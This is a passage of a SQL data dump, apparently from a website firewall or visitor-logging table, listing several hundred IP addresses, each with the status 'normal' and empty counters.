0,'[]'),(1685,'85.95.146.83','normal','',0,0,0,0,0,'[]'),(1686,'103.56.160.61','normal','',0,0,0,0,0,'[]'),(1687,'42.194.215.216','normal','',0,0,0,0,0,'[]'),(1688,'159.75.102.74','normal','',0,0,0,0,0,'[]'),(1689,'165.232.183.66','normal','',0,0,0,0,0,'[]'),(1690,'123.145.132.201','normal','',0,0,0,0,0,'[]'),(1691,'143.110.137.82','normal','',0,0,0,0,0,'[]'),(1692,'66.85.138.66','normal','',0,0,0,0,0,'[]'),(1693,'185.233.116.44','normal','',0,0,0,0,0,'[]'),(1694,'185.233.116.44','normal','',0,0,0,0,0,'[]'),(1695,'185.17.113.189','normal','',0,0,0,0,0,'[]'),(1696,'91.121.143.142','normal','',0,0,0,0,0,'[]'),(1697,'178.128.209.28','normal','',0,0,0,0,0,'[]'),(1698,'20.204.118.88','normal','',0,0,0,0,0,'[]'),(1699,'95.167.178.158','normal','',0,0,0,0,0,'[]'),(1700,'176.9.104.214','normal','',0,0,0,0,0,'[]'),(1701,'178.172.136.168','normal','',0,0,0,0,0,'[]'),(1702,'188.225.82.128','normal','',0,0,0,0,0,'[]'),(1703,'31.220.106.142','normal','',0,0,0,0,0,'[]'),(1704,'5.161.146.77','normal','',0,0,0,0,0,'[]'),(1705,'5.101.157.28','normal','',0,0,0,0,0,'[]'),(1706,'185.9.147.4','normal','',0,0,0,0,0,'[]'),(1707,'35.168.222.92','normal','',0,0,0,0,0,'[]'),(1708,'5.101.157.136','normal','',0,0,0,0,0,'[]'),(1709,'51.210.111.136','normal','',0,0,0,0,0,'[]'),(1710,'5.101.156.6','normal','',0,0,0,0,0,'[]'),(1711,'5.101.156.6','normal','',0,0,0,0,0,'[]'),(1712,'178.208.67.9','normal','',0,0,0,0,0,'[]'),(1713,'178.208.67.9','normal','',0,0,0,0,0,'[]'),(1714,'35.229.38.99','normal','',0,0,0,0,0,'[]'),(1715,'87.237.212.30','normal','',0,0,0,0,0,'[]'),(1716,'200.80.43.110','normal','',0,0,0,0,0,'[]'),(1717,'5.101.157.180','normal','',0,0,0,0,0,'[]'),(1718,'5.101.157.220','normal','',0,0,0,0,0,'[]'),(1719,'198.199.76.156','normal','',0,0,0,0,0,'[]'),(1720,'213.159.7.70','normal','',0,0,0,0,0,'[]'),(1721,'114.119.155.13','normal','',0,0,0,0,0,'[]'),(1722,'5.101.157.215','normal','',0,0,0,0,0,'[]'),(1723,'213.142.149.80','normal','',0,0,0,0,0,'[]'),(1724,'213.142.149.80','normal','',0,0,0,0,0,'[]'),(1725,'5.101.157.29','normal','',0,0,0,0,0,'[]'),(1726,'5.101.157.29','normal','',0,0,0,0,0,'[]'),(1727,'65.21.9.119','normal','',0,0,0,0,0,'[]'),(1728,'5.101.157.246','normal','',0,0,0,0,0,'[]'),(1729,'5.101.157.246','normal','',0,0,0,0,0,'[]'),(1730,'121.40.238.50','normal','',0,0,0,0,0,'[]'),(1731,'5.101.157.179','normal','',0,0,0,0,0,'[]'),(1732,'35.196.89.180','normal','',0,0,0,0,0,'[]'),(1733,'5.101.157.8','normal','',0,0,0,0,0,'[]'),(1734,'193.0.61.218','normal','',0,0,0,0,0,'[]'),(1735,'109.61.102.55','normal','',0,0,0,0,0,'[]'),(1736,'158.69.36.41','normal','',0,0,0,0,0,'[]'),(1737,'91.201.215.153','normal','',0,0,0,0,0,'[]'),(1738,'159.223.18.196','normal','',0,0,0,0,0,'[]'),(1739,'159.223.18.196','normal','',0,0,0,0,0,'[]'),(1740,'87.236.20.170','normal','',0,0,0,0,0,'[]'),(1741,'45.119.213.225','normal','',0,0,0,0,0,'[]'),(1742,'5.101.157.230','normal','',0,0,0,0,0,'[]'),(1743,'5.101.157.230','normal','',0,0,0,0,0,'[]'),(1744,'95.214.24.135','normal','',0,0,0,0,0,'[]'),(1745,'45.132.107.34','normal','',0,0,0,0,0,'[]'),(1746,'178.62.108.24','normal','',0,0,0,0,0,'[]'),(1747,'168.90.196.196','normal','',0,0,0,0,0,'[]'),(1748,'103.225.201.79','normal','',0,0,0,0,0,'[]'),(1749,'157.245.38.42','normal','',0,0,0,0,0,'[]'),(1750,'176.9.41.169','normal','',0,0,0,0,0,'[]'),(1751,'167.172.79.125','normal','',0,0,0,0,0,'[]'),(1752,'89.108.119.229','normal','',0,0,0,0,0,'[]'),(1753,'176.31.226.16','normal','',0,0,0,0,0,'[]'),(1754,'135.125.182.238','normal','',0,0,0,0,0,'[]'),(1755,'47.88.22.184','normal','',0,0,0,0,0,'[]'),(1756,'47.88.22.184','normal','',0,0,0,0,0,'[]'),(1757,'185.106.22.30','normal','',0,0,0,0,0,'[]'),(1758,'185.106.22.30','normal','',0,0,0,0,0,'[]'),(1759,'185.67.1.211','normal','',0,0,0,0,0,'[]'),(1760,'185.126.176.114','normal','',0,0,0,0,0,'[]'),(1761,'185.126.176.114','normal','',0,0,0,0,0,'[]'),(1762,'54.213.95.38','normal','',0,0,0,0,0,'[]'),(1763,'52.26.245.207','normal','',0,0,0,0,0,'[]'),(1764,'35.88.233.157','normal','',0,0,0,0,0,'[]'),(1765,'35.92.232.90','normal','',0,0,0,0,0,'[]'),(1766,'51.79.241.19','normal','',0,0,0,0,0,'[]'),(1767,'35.90.32.89','normal','',0,0,0,0,0,'[]'),(1768,'35.90.127.243','normal','',0,0,0,0,0,'[]'),(1769,'35.92.157.150','normal','',0,0,0,0,0,'[]'),(1770,'54.188.198.86','normal','',0,0,0,0,0,'[]'),(1771,'188.40.224.241','normal','',0,0,0,0,0,'[]'),(1772,'144.126.159.38','normal','',0,0,0,0,0,'[]'),(1773,'109.205.182.169','normal','',0,0,0,0,0,'[]'),(1774,'5.187.1.84','normal','',0,0,0,0,0,'[]'),(1775,'93.158.91.239','normal','',0,0,0,0,0,'[]'),(1776,'93.158.91.241','normal','',0,0,0,0,0,'[]'),(1777,'93.158.91.243','normal','',0,0,0,0,0,'[]'),(1778,'103.8.25.74','normal','',0,0,0,0,0,'[]'),(1779,'167.172.81.8','normal','',0,0,0,0,0,'[]'),(1780,'114.119.144.37','normal','',0,0,0,0,0,'[]'),(1781,'46.4.88.149','normal','',0,0,0,0,0,'[]'),(1782,'46.4.88.149','normal','',0,0,0,0,0,'[]'),(1783,'185.104.44.128','normal','',0,0,0,0,0,'[]'),(1784,'65.21.13.12','normal','',0,0,0,0,0,'[]'),(1785,'185.132.82.182','normal','',0,0,0,0,0,'[]'),(1786,'51.255.64.58','normal','',0,0,0,0,0,'[]'),(1787,'20.254.169.192','normal','',0,0,0,0,0,'[]'),(1788,'34.139.189.70','normal','',0,0,0,0,0,'[]'),(1789,'51.68.228.235','normal','',0,0,0,0,0,'[]'),(1790,'165.22.221.148','normal','',0,0,0,0,0,'[]'),(1791,'107.178.207.7','normal','',0,0,0,0,0,'[]'),(1792,'45.147.197.20','normal','',0,0,0,0,0,'[]'),(1793,'207.244.239.41','normal','',0,0,0,0,0,'[]'),(1794,'81.88.52.134','normal','',0,0,0,0,0,'[]'),(1795,'52.136.250.193','normal','',0,0,0,0,0,'[]'),(1796,'23.148.145.50','normal','',0,0,0,0,0,'[]'),(1797,'104.168.22.195','normal','',0,0,0,0,0,'[]'),(1798,'188.120.228.213','normal','',0,0,0,0,0,'[]'),(1799,'192.145.37.33','normal','',0,0,0,0,0,'[]'),(1800,'95.213.194.189','normal','',0,0,0,0,0,'[]'),(1801,'174.240.147.4','normal','',0,0,0,0,0,'[]'),(1802,'18.215.160.91','normal','',0,0,0,0,0,'[]'),(1803,'195.123.212.109','normal','',0,0,0,0,0,'[]'),(1804,'195.242.218.237','normal','',0,0,0,0,0,'[]'),(1805,'34.139.233.5','normal','',0,0,0,0,0,'[]'),(1806,'193.235.141.176','normal','',0,0,0,0,0,'[]'),(1807,'44.210.144.120','normal','',0,0,0,0,0,'[]'),(1808,'91.226.83.220','normal','',0,0,0,0,0,'[]'),(1809,'91.226.83.220','normal','',0,0,0,0,0,'[]'),(1810,'178.159.243.220','normal','',0,0,0,0,0,'[]'),(1811,'45.90.34.141','normal','',0,0,0,0,0,'[]'),(1812,'192.53.168.65','normal','',0,0,0,0,0,'[]'),(1813,'67.205.62.239','normal','',0,0,0,0,0,'[]'),(1814,'67.205.62.239','normal','',0,0,0,0,0,'[]'),(1815,'35.190.139.53','normal','',0,0,0,0,0,'[]'),(1816,'78.135.106.191','normal','',0,0,0,0,0,'[]'),(1817,'78.135.106.191','normal','',0,0,0,0,0,'[]'),(1818,'178.208.67.56','normal','',0,0,0,0,0,'[]'),(1819,'178.208.67.56','normal','',0,0,0,0,0,'[]'),(1820,'77.222.52.120','normal','',0,0,0,0,0,'[]'),(1821,'77.222.52.120','normal','',0,0,0,0,0,'[]'),(1822,'35.173.36.23','normal','',0,0,0,0,0,'[]'),(1823,'45.252.250.41','normal','',0,0,0,0,0,'[]'),(1824,'3.236.209.38','normal','',0,0,0,0,0,'[]'),(1825,'136.243.118.43','normal','',0,0,0,0,0,'[]'),(1826,'139.180.214.251','normal','',0,0,0,0,0,'[]'),(1827,'43.205.95.5','normal','',0,0,0,0,0,'[]'),(1828,'47.110.72.238','normal','',0,0,0,0,0,'[]'),(1829,'178.128.115.104','normal','',0,0,0,0,0,'[]'),(1830,'198.71.231.59','normal','',0,0,0,0,0,'[]'),(1831,'92.204.239.206','normal','',0,0,0,0,0,'[]'),(1832,'195.123.216.11','normal','',0,0,0,0,0,'[]'),(1833,'198.71.225.84','normal','',0,0,0,0,0,'[]'),(1834,'198.71.236.64','normal','',0,0,0,0,0,'[]'),(1835,'150.217.73.228','normal','',0,0,0,0,0,'[]'),(1836,'148.72.56.195','normal','',0,0,0,0,0,'[]'),(1837,'45.135.150.147','normal','',0,0,0,0,0,'[]'),(1838,'37.187.152.127','normal','',0,0,0,0,0,'[]'),(1839,'198.71.235.21','normal','',0,0,0,0,0,'[]'),(1840,'103.127.41.122','normal','',0,0,0,0,0,'[]'),(1841,'50.62.177.106','normal','',0,0,0,0,0,'[]'),(1842,'192.64.84.254','normal','',0,0,0,0,0,'[]'),(1843,'31.14.161.205','normal','',0,0,0,0,0,'[]'),(1844,'64.29.146.180','normal','',0,0,0,0,0,'[]'),(1845,'54.37.121.239','normal','',0,0,0,0,0,'[]'),(1846,'41.216.129.198','normal','',0,0,0,0,0,'[]'),(1847,'197.221.0.166','normal','',0,0,0,0,0,'[]'),(1848,'69.160.65.50','normal','',0,0,0,0,0,'[]'),(1849,'86.111.242.97','normal','',0,0,0,0,0,'[]'),(1850,'99.192.210.98','normal','',0,0,0,0,0,'[]'),(1851,'157.7.188.211','normal','',0,0,0,0,0,'[]'),(1852,'69.49.99.144','normal','',0,0,0,0,0,'[]'),(1853,'185.183.8.64','normal','',0,0,0,0,0,'[]'),(1854,'188.225.74.67','normal','',0,0,0,0,0,'[]'),(1855,'3.82.16.103','normal','',0,0,0,0,0,'[]'),(1856,'54.36.148.38','normal','',0,0,0,0,0,'[]'),(1857,'23.106.22.126','normal','',0,0,0,0,0,'[]'),(1858,'23.106.22.156','normal','',0,0,0,0,0,'[]'),(1859,'62.109.0.206','normal','',0,0,0,0,0,'[]'),(1860,'134.0.115.193','normal','',0,0,0,0,0,'[]'),(1861,'143.198.226.137','normal','',0,0,0,0,0,'[]'),(1862,'5.161.128.226','normal','',0,0,0,0,0,'[]'),(1863,'18.207.136.85','normal','',0,0,0,0,0,'[]'),(1864,'178.18.206.98','normal','',0,0,0,0,0,'[]'),(1865,'39.108.148.88','normal','',0,0,0,0,0,'[]'),(1866,'5.189.183.89','normal','',0,0,0,0,0,'[]'),(1867,'91.239.142.71','normal','',0,0,0,0,0,'[]'),(1868,'209.209.42.114','normal','',0,0,0,0,0,'[]'),(1869,'86.110.212.34','normal','',0,0,0,0,0,'[]'),(1870,'89.252.178.177','normal','',0,0,0,0,0,'[]'),(1871,'18.215.235.248','normal','',0,0,0,0,0,'[]'),(1872,'95.217.145.167','normal','',0,0,0,0,0,'[]'),(1873,'87.65.30.42','normal','',0,0,0,0,0,'[]'),(1874,'3.108.229.253','normal','',0,0,0,0,0,'[]'),(1875,'3.108.229.253','normal','',0,0,0,0,0,'[]'),(1876,'167.114.113.132','normal','',0,0,0,0,0,'[]'),(1877,'207.46.13.206','normal','',0,0,0,0,0,'[]'),(1878,'45.88.105.207','normal','',0,0,0,0,0,'[]'),(1879,'2.59.42.129','normal','',0,0,0,0,0,'[]'),(1880,'94.130.34.161','normal','',0,0,0,0,0,'[]'),(1881,'162.241.216.224','normal','',0,0,0,0,0,'[]'),(1882,'150.95.109.187','normal','',0,0,0,0,0,'[]'),(1883,'35.195.135.67','normal','',0,0,0,0,0,'[]'),(1884,'167.71.216.37','normal','',0,0,0,0,0,'[]'),(1885,'107.167.84.10','normal','',0,0,0,0,0,'[]'),(1886,'185.241.5.213','normal','',0,0,0,0,0,'[]'),(1887,'87.107.144.155','normal','',0,0,0,0,0,'[]'),(1888,'3.110.233.163','normal','',0,0,0,0,0,'[]'),(1889,'43.129.212.158','normal','',0,0,0,0,0,'[]'),(1890,'23.96.121.207','normal','',0,0,0,0,0,'[]'),(1891,'194.58.88.214','normal','',0,0,0,0,0,'[]'),(1892,'51.178.136.33','normal','',0,0,0,0,0,'[]'),(1893,'46.101.116.31','normal','',0,0,0,0,0,'[]'),(1894,'34.146.39.255','normal','',0,0,0,0,0,'[]'),(1895,'135.181.132.217','normal','',0,0,0,0,0,'[]'),(1896,'207.244.251.52','normal','',0,0,0,0,0,'[]'),(1897,'69.16.238.78','normal','',0,0,0,0,0,'[]'),(1898,'162.144.87.29','normal','',0,0,0,0,0,'[]'),(1899,'67.205.30.255','normal','',0,0,0,0,0,'[]'),(1900,'82.218.176.68','normal','',0,0,0,0,0,'[]'),(1901,'82.218.176.68','normal','',0,0,0,0,0,'[]'),(1902,'35.229.75.201','normal','',0,0,0,0,0,'[]'),(1903,'91.201.215.19','normal','',0,0,0,0,0,'[]'),(1904,'134.122.35.243','normal','',0,0,0,0,0,'[]'),(1905,'188.166.42.119','normal','',0,0,0,0,0,'[]'),(1906,'188.166.42.119','normal','',0,0,0,0,0,'[]'),(1907,'119.2.47.78','normal','',0,0,0,0,0,'[]'),(1908,'61.222.243.149','normal','',0,0,0,0,0,'[]'),(1909,'198.144.188.12','normal','',0,0,0,0,0,'[]'),(1910,'195.5.116.247','normal','',0,0,0,0,0,'[]'),(1911,'24.41.60.59','normal','',0,0,0,0,0,'[]'),(1912,'114.119.142.181','normal','',0,0,0,0,0,'[]'),(1913,'131.72.236.73','normal','',0,0,0,0,0,'[]'),(1914,'188.212.34.36','normal','',0,0,0,0,0,'[]'),(1915,'5.189.175.67','normal','',0,0,0,0,0,'[]'),(1916,'5.189.175.67','normal','',0,0,0,0,0,'[]'),(1917,'23.230.235.218','normal','',0,0,0,0,0,'[]'),(1918,'23.230.235.158','normal','',0,0,0,0,0,'[]'),(1919,'23.230.235.207','normal','',0,0,0,0,0,'[]'),(1920,'23.230.235.246','normal','',0,0,0,0,0,'[]'),(1921,'23.230.235.242','normal','',0,0,0,0,0,'[]'),(1922,'72.167.225.151','normal','',0,0,0,0,0,'[]'),(1923,'23.230.235.48','normal','',0,0,0,0,0,'[]'),(1924,'23.230.235.119','normal','',0,0,0,0,0,'[]'),(1925,'23.230.235.192','normal','',0,0,0,0,0,'[]'),(1926,'23.230.235.101','normal','',0,0,0,0,0,'[]'),(1927,'23.230.235.14','normal','',0,0,0,0,0,'[]'),(1928,'195.93.152.83','normal','',0,0,0,0,0,'[]'),(1929,'18.221.17.249','normal','',0,0,0,0,0,'[]'),(1930,'18.221.17.249','normal','',0,0,0,0,0,'[]'),(1931,'23.230.235.248','normal','',0,0,0,0,0,'[]'),(1932,'23.230.235.228','normal','',0,0,0,0,0,'[]'),(1933,'23.230.235.96','normal','',0,0,0,0,0,'[]'),(1934,'23.230.235.176','normal','',0,0,0,0,0,'[]'),(1935,'23.230.235.195','normal','',0,0,0,0,0,'[]'),(1936,'5.175.45.32','normal','',0,0,0,0,0,'[]'),(1937,'164.90.170.66','normal','',0,0,0,0,0,'[]'),(1938,'103.252.1.137','normal','',0,0,0,0,0,'[]'),(1939,'89.252.156.220','normal','',0,0,0,0,0,'[]'),(1940,'134.209.148.191','normal','',0,0,0,0,0,'[]'),(1941,'107.6.150.132','normal','',0,0,0,0,0,'[]'),(1942,'23.230.235.45','normal','',0,0,0,0,0,'[]'),(1943,'23.230.235.109','normal','',0,0,0,0,0,'[]'),(1944,'202.162.205.236','normal','',0,0,0,0,0,'[]'),(1945,'120.25.104.120','normal','',0,0,0,0,0,'[]'),(1946,'165.227.47.204','normal','',0,0,0,0,0,'[]'),(1947,'165.227.47.204','normal','',0,0,0,0,0,'[]'),(1948,'134.209.192.202','normal','',0,0,0,0,0,'[]'),(1949,'134.209.192.202','normal','',0,0,0,0,0,'[]'),(1950,'64.90.36.102','normal','',0,0,0,0,0,'[]'),(1951,'95.213.186.158','normal','',0,0,0,0,0,'[]'),(1952,'95.213.186.158','normal','',0,0,0,0,0,'[]'),(1953,'34.222.172.82','normal','',0,0,0,0,0,'[]'),(1954,'185.39.144.147','normal','',0,0,0,0,0,'[]'),(1955,'165.227.159.195','normal','',0,0,0,0,0,'[]'),(1956,'165.227.159.195','normal','',0,0,0,0,0,'[]'),(1957,'178.211.58.145','normal','',0,0,0,0,0,'[]'),(1958,'178.20.42.21','normal','',0,0,0,0,0,'[]'),(1959,'82.202.174.35','normal','',0,0,0,0,0,'[]'),(1960,'81.71.100.192','normal','',0,0,0,0,0,'[]'),(1961,'42.194.241.189','normal','',0,0,0,0,0,'[]'),(1962,'91.228.7.83','normal','',0,0,0,0,0,'[]'),(1963,'91.228.7.83','normal','',0,0,0,0,0,'[]'),(1964,'198.13.57.104','normal','',0,0,0,0,0,'[]'),(1965,'198.13.57.104','normal','',0,0,0,0,0,'[]'),(1966,'185.99.199.206','normal','',0,0,0,0,0,'[]'),(1967,'185.99.199.206','normal','',0,0,0,0,0,'[]'),(1968,'114.119.143.172','normal','',0,0,0,0,0,'[]'),(1969,'47.88.61.91','normal','',0,0,0,0,0,'[]'),(1970,'143.244.136.25','normal','',0,0,0,0,0,'[]'),(1971,'143.244.136.25','normal','',0,0,0,0,0,'[]'),(1972,'51.159.97.30','normal','',0,0,0,0,0,'[]'),(1973,'89.32.46.91','normal','',0,0,0,0,0,'[]'),(1974,'209.141.47.94','normal','',0,0,0,0,0,'[]'),(1975,'185.137.233.8','normal','',0,0,0,0,0,'[]'),(1976,'157.245.79.169','normal','',0,0,0,0,0,'[]'),(1977,'157.245.79.169','normal','',0,0,0,0,0,'[]'),(1978,'142.132.233.34','normal','',0,0,0,0,0,'[]'),(1979,'198.98.50.216','normal','',0,0,0,0,0,'[]'),(1980,'79.143.188.53','normal','',0,0,0,0,0,'[]'),(1981,'217.160.212.39','normal','',0,0,0,0,0,'[]'),(1982,'37.1.206.86','normal','',0,0,0,0,0,'[]'),(1983,'37.1.206.86','normal','',0,0,0,0,0,'[]'),(1984,'185.180.143.75','normal','',0,0,0,0,0,'[]'),(1985,'209.141.49.253','normal','',0,0,0,0,0,'[]'),(1986,'42.194.230.87','normal','',0,0,0,0,0,'[]'),(1987,'42.194.232.66','normal','',0,0,0,0,0,'[]'),(1988,'106.15.38.206','normal','',0,0,0,0,0,'[]'),(1989,'158.69.243.138','normal','',0,0,0,0,0,'[]'),(1990,'46.101.163.94','normal','',0,0,0,0,0,'[]'),(1991,'185.81.158.132','normal','',0,0,0,0,0,'[]'),(1992,'35.225.100.86','normal','',0,0,0,0,0,'[]'),(1993,'107.189.14.89','normal','',0,0,0,0,0,'[]'),(1994,'47.105.73.13','normal','',0,0,0,0,0,'[]'),(1995,'198.199.121.9','normal','',0,0,0,0,0,'[]'),(1996,'198.199.121.9','normal','',0,0,0,0,0,'[]'),(1997,'77.244.214.239','normal','',0,0,0,0,0,'[]'),(1998,'104.244.77.192','normal','',0,0,0,0,0,'[]'),(1999,'35.129.24.198','normal','',0,0,0,0,0,'[]'),(2000,'157.55.39.234','normal','',0,0,0,0,0,'[]'),(2001,'40.77.190.20','normal','',0,0,0,0,0,'[]'),(2002,'120.27.240.230','normal','',0,0,0,0,0,'[]'),(2003,'46.17.175.76','normal','',0,0,0,0,0,'[]'),(2004,'8.218.143.243','normal','',0,0,0,0,0,'[]'),(2005,'1.14.96.192','normal','',0,0,0,0,0,'[]'),(2006,'50.116.103.221','normal','',0,0,0,0,0,'[]'),(2007,'167.71.111.16','normal','',0,0,0,0,0,'[]'),(2008,'65.21.105.105','normal','',0,0,0,0,0,'[]'),(2009,'54.147.129.244','normal','',0,0,0,0,0,'[]'),(2010,'124.40.255.186','normal','',0,0,0,0,0,'[]'),(2011,'196.19.10.7','normal','',0,0,0,0,0,'[]'),(2012,'54.234.144.170','normal','',0,0,0,0,0,'[]'),(2013,'35.196.217.92','normal','',0,0,0,0,0,'[]'),(2014,'100.24.108.51','normal','',0,0,0,0,0,'[]'),(2015,'50.116.74.176','normal','',0,0,0,0,0,'[]'),(2016,'176.53.62.61','normal','',0,0,0,0,0,'[]'),(2017,'148.72.209.0','normal','',0,0,0,0,0,'[]'),(2018,'185.191.171.33','normal','',0,0,0,0,0,'[]'),(2019,'185.191.171.9','normal','',0,0,0,0,0,'[]'),(2020,'185.191.171.40','normal','',0,0,0,0,0,'[]'),(2021,'185.191.171.10','normal','',0,0,0,0,0,'[]'),(2022,'20.99.160.150','normal','',0,0,0,0,0,'[]'),(2023,'34.73.95.124','normal','',0,0,0,0,0,'[]'),(2024,'95.217.3.120','normal','',0,0,0,0,0,'[]'),(2025,'51.12.53.22','normal','',0,0,0,0,0,'[]'),(2026,'47.91.198.167','normal','',0,0,0,0,0,'[]'),(2027,'135.125.207.25','normal','',0,0,0,0,0,'[]'),(2028,'165.22.89.6','normal','',0,0,0,0,0,'[]'),(2029,'20.99.164.78','normal','',0,0,0,0,0,'[]'),(2030,'174.211.33.227','normal','',0,0,0,0,0,'[]'),(2031,'45.32.100.154','normal','',0,0,0,0,0,'[]'),(2032,'34.74.194.38','normal','',0,0,0,0,0,'[]'),(2033,'65.108.110.26','normal','',0,0,0,0,0,'[]'),(2034,'77.75.72.26','normal','',0,0,0,0,0,'[]'),(2035,'20.99.167.21','normal','',0,0,0,0,0,'[]'),(2036,'117.53.154.162','normal','',0,0,0,0,0,'[]'),(2037,'114.119.145.100','normal','',0,0,0,0,0,'[]'),(2038,'65.108.46.72','normal','',0,0,0,0,0,'[]'),(2039,'89.252.156.178','normal','',0,0,0,0,0,'[]'),(2040,'77.68.122.133','normal','',0,0,0,0,0,'[]'),(2041,'95.217.149.71','normal','',0,0,0,0,0,'[]'),(2042,'173.82.106.128','normal','',0,0,0,0,0,'[]'),(2043,'51.254.101.7','normal','',0,0,0,0,0,'[]'),(2044,'185.245.182.166','normal','',0,0,0,0,0,'[]'),(2045,'50.202.38.3','normal','',0,0,0,0,0,'[]'),(2046,'114.119.136.217','normal','',0,0,0,0,0,'[]'),(2047,'77.51.179.130','normal','',0,0,0,0,0,'[]'),(2048,'5.161.73.37','normal','',0,0,0,0,0,'[]'),(2049,'20.99.167.25','normal','',0,0,0,0,0,'[]'),(2050,'23.230.235.172','normal','',0,0,0,0,0,'[]'),(2051,'23.230.235.199','normal','',0,0,0,0,0,'[]'),(2052,'23.230.235.185','normal','',0,0,0,0,0,'[]'),(2053,'23.230.235.148','normal','',0,0,0,0,0,'[]'),(2054,'79.110.62.65','normal','',0,0,0,0,0,'[]'),(2055,'193.107.158.16','normal','',0,0,0,0,0,'[]'),(2056,'208.109.9.181','normal','',0,0,0,0,0,'[]'),(2057,'92.63.97.240','normal','',0,0,0,0,0,'[]'),(2058,'77.247.243.250','normal','',0,0,0,0,0,'[]'),(2059,'208.51.60.207','normal','',0,0,0,0,0,'[]'),(2060,'5.39.84.56','normal','',0,0,0,0,0,'[]'),(2061,'168.119.227.50','normal','',0,0,0,0,0,'[]'),(2062,'51.68.11.223','normal','',0,0,0,0,0,'[]'),(2063,'5.101.156.20','normal','',0,0,0,0,0,'[]'),(2064,'198.211.115.226','normal','',0,0,0,0,0,'[]'),(2065,'185.205.246.129','normal','',0,0,0,0,0,'[]'),(2066,'88.99.165.9','normal','',0,0,0,0,0,'[]'),(2067,'34.139.246.249','normal','',0,0,0,0,0,'[]'),(2068,'167.71.69.173','normal','',0,0,0,0,0,'[]'),(2069,'195.201.31.183','normal','',0,0,0,0,0,'[]'),(2070,'80.78.255.36','normal','',0,0,0,0,0,'[]'),(2071,'134.122.124.233','normal','',0,0,0,0,0,'[]'),(2072,'132.148.165.91','normal','',0,0,0,0,0,'[]'),(2073,'31.130.252.56','normal','',0,0,0,0,0,'[]'),(2074,'162.240.211.236','normal','',0,0,0,0,0,'[]'),(2075,'95.173.161.171','normal','',0,0,0,0,0,'[]'),(2076,'103.130.218.101','normal','',0,0,0,0,0,'[]'),(2077,'5.101.156.223','normal','',0,0,0,0,0,'[]'),(2078,'95.216.97.144','normal','',0,0,0,0,0,'[]'),(2079,'178.159.46.67','normal','',0,0,0,0,0,'[]'),(2080,'61.219.171.85','normal','',0,0,0,0,0,'[]'),(2081,'92.204.134.137','normal','',0,0,0,0,0,'[]'),(2082,'20.199.116.53','normal','',0,0,0,0,0,'[]'),(2083,'209.141.57.9','normal','',0,0,0,0,0,'[]'),(2084,'128.199.134.216','normal','',0,0,0,0,0,'[]'),(2085,'120.24.108.217','normal','',0,0,0,0,0,'[]'),(2086,'81.68.87.46','normal','',0,0,0,0,0,'[]'),(2087,'104.248.241.28','normal','',0,0,0,0,0,'[]'),(2088,'178.251.28.102','normal','',0,0,0,0,0,'[]'),(2089,'209.141.37.194','normal','',0,0,0,0,0,'[]'),(2090,'88.135.37.49','normal','',0,0,0,0,0,'[]'),(2091,'209.141.48.210','normal','',0,0,0,0,0,'[]'),(2092,'34.221.207.48','normal','',0,0,0,0,0,'[]'),(2093,'52.42.77.108','normal','',0,0,0,0,0,'[]'),(2094,'54.185.14.24','normal','',0,0,0,0,0,'[]'),(2095,'35.161.78.139','normal','',0,0,0,0,0,'[]'),(2096,'5.101.115.109','normal','',0,0,0,0,0,'[]'),(2097,'20.163.12.45','normal','',0,0,0,0,0,'[]'),(2098,'139.196.152.3','normal','',0,0,0,0,0,'[]'),(2099,'103.171.181.53','normal','',0,0,0,0,0,'[]'),(2100,'37.46.134.198','normal','',0,0,0,0,0,'[]'),(2101,'74.208.24.30','normal','',0,0,0,0,0,'[]'),(2102,'46.161.27.155','normal','',0,0,0,0,0,'[]'),(2103,'68.183.15.215','normal','',0,0,0,0,0,'[]'),(2104,'67.205.136.68','normal','',0,0,0,0,0,'[]'),(2105,'34.138.120.29','normal','',0,0,0,0,0,'[]'),(2106,'166.62.85.162','normal','',0,0,0,0,0,'[]'),(2107,'35.194.233.240','normal','',0,0,0,0,0,'[]'),(2108,'39.173.116.5','normal','',0,0,0,0,0,'[]'),(2109,'34.76.63.113','normal','',0,0,0,0,0,'[]'),(2110,'89.253.233.129','normal','',0,0,0,0,0,'[]'),(2111,'93.84.114.152','normal','',0,0,0,0,0,'[]'),(2112,'46.101.62.7','normal','',0,0,0,0,0,'[]'),(2113,'107.189.6.184','normal','',0,0,0,0,0,'[]'),(2114,'20.118.132.111','normal','',0,0,0,0,0,'[]'),(2115,'178.128.53.95','normal','',0,0,0,0,0,'[]'),(2116,'159.223.61.117','normal','',0,0,0,0,0,'[]'),(2117,'154.54.249.201','normal','',0,0,0,0,0,'[]'),(2118,'47.241.15.216','normal','',0,0,0,0,0,'[]'),(2119,'23.88.110.165','normal','',0,0,0,0,0,'[]'),(2120,'23.88.110.165','normal','',0,0,0,0,0,'[]'),(2121,'20.169.1.9','normal','',0,0,0,0,0,'[]'),(2122,'34.136.77.170','normal','',0,0,0,0,0,'[]'),(2123,'34.136.77.170','normal','',0,0,0,0,0,'[]'),(2124,'195.161.68.182','normal','',0,0,0,0,0,'[]'),(2125,'88.84.193.250','normal','',0,0,0,0,0,'[]'),(2126,'124.221.248.242','normal','',0,0,0,0,0,'[]'),(2127,'5.61.59.36','normal','',0,0,0,0,0,'[]'),(2128,'221.170.12.124','normal','',0,0,0,0,0,'[]'),(2129,'5.101.115.81','normal','',0,0,0,0,0,'[]'),(2130,'5.101.115.81','normal','',0,0,0,0,0,'[]'),(2131,'109.162.126.245','normal','',0,0,0,0,0,'[]'),(2132,'34.77.127.183','normal','',0,0,0,0,0,'[]'),(2133,'34.76.158.233','normal','',0,0,0,0,0,'[]'),(2134,'168.253.115.79','normal','',0,0,0,0,0,'[]'),(2135,'209.141.36.190','normal','',0,0,0,0,0,'[]'),(2136,'198.252.110.226','normal','',0,0,0,0,0,'[]'),(2137,'185.165.42.75','normal','',0,0,0,0,0,'[]'),(2138,'185.104.28.48','normal','',0,0,0,0,0,'[]'),(2139,'144.126.130.148','normal','',0,0,0,0,0,'[]'),(2140,'103.114.105.37','normal','',0,0,0,0,0,'[]'),(2141,'54.36.148.34','normal','',0,0,0,0,0,'[]'),(2142,'54.36.148.244','normal','',0,0,0,0,0,'[]'),(2143,'209.141.44.126','normal','',0,0,0,0,0,'[]'),(2144,'133.167.92.28','normal','',0,0,0,0,0,'[]'),(2145,'196.18.229.154','normal','',0,0,0,0,0,'[]'),(2146,'103.225.200.125','normal','',0,0,0,0,0,'[]'),(2147,'190.169.30.9','normal','',0,0,0,0,0,'[]'),(2148,'173.212.230.229','normal','',0,0,0,0,0,'[]'),(2149,'3.109.16.228','normal','',0,0,0,0,0,'[]'),(2150,'114.119.139.212','normal','',0,0,0,0,0,'[]'),(2151,'139.59.147.218','normal','',0,0,0,0,0,'[]'),(2152,'162.241.224.101','normal','',0,0,0,0,0,'[]'),(2153,'128.199.203.239','normal','',